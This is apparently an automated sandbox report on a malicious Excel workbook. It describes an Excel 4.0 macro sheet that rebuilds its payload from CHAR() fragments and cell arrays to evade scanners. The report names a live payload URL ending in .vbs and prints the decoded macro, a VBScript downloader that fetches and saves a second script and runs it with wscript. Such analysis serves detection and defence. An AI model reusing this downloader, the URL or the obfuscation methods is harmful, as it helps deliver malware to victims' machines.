MALICIOUS
182
Risk Score
Heuristics 4
-
Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
-
XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOADAn Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
-
URL reconstructed from XLM cell array (1 URL) critical OOXML_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://astaoffices.com/am/amteruth.vbs Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image3.emf | 38932 bytes |
SHA-256: 54900bf09168b2eab2b0340f9ddd2245a14a0867bfd12768887a3fc4a7a45b73 |
|||
xlm_sheet_00.bin |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 2943 bytes |
SHA-256: 249bfb8ce39d6c8c23df5111f52ff1d172120cb8bdb0c28501c8c3f76447b023 |
|||
Preview scriptFirst 1,000 lines of the extracted script
� � � @ �������� � . h o � � � � @ d � $ � � � ���� � < � � � h h Sh @ k f u C : \ U s e r s \ P u b l i c \ B X h h Hh 5 f i l C m w k d v 4 . v b s B � B X h h Fh 3 C O n E r r o r R e s u m e N e x t A� h h @h - C k g o 7 y i = " m i c r O s " A� h h :h ' C k 0 a 3 3 3 = " a D o " A� h h @h - C g f 4 m r h = " d b . s T r " A� h h Hh 5 C m a x l 0 1 = " o f t . x m l h " A� h h @h - C t p 1 c v u = " D o� " A� h o � h � C > d i m q j h k y w : S e t q j h k y w = c r e a t e o b j e c t ( k 0 a 3 3 3 & g f 4 m r h & " e a m " ) A� o ! h o � h � C > d i m e h p q k k : S e t e h p q k k = c r e a t e o b j e c t ( k g o 7 y i & m a x l 0 1 & " T T P " ) A� " h o ^h K C e h p q k k . O p e n " G E T " , t p 1 c v u , F a l s e A� # h o 4h ! C e h p q k k . S e n d A� $ h o 4h ! C w i t h q j h k y w A� % h o 8h % C . t y p e = 1 A� & h o 0h C . o p e n A� ' h o Zh G C . w r i t e e h p q k k . r e s p o n s e B o d y A� ( h o lh Y C . s a v e t o f i l e " C m s e x c e l . v b s " , 2 A� ) h o .h C e n d w i t h A� * h o � h � C G e t O 3 b j e c t ( " n e w : 1 3 7 0 9 6 2 0 - C 2 7 9 - 1 1 C E - A 4 9 E - 4 4 4 5 5 3 5 4 0 0 0 0 " ) . O p e n ( " C m s e x c e l . v b s " ) A� + h o 0h C E r r . C l e a r A� , h o h C A� - h o Ph = w s c r i p t C m w k d v 4 . v b s B n . h o h B 6 � � � �� @ �< �^I�n��! � ꨡ�� ���h�1m�:��rd�� � _J���Tަ���L.m��ߒԼ� � �4� � �s�X � F�D S H A - 5 1 2 � B � � 0ffffff�?ffffff�? �? �?333333�?333333�?� |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.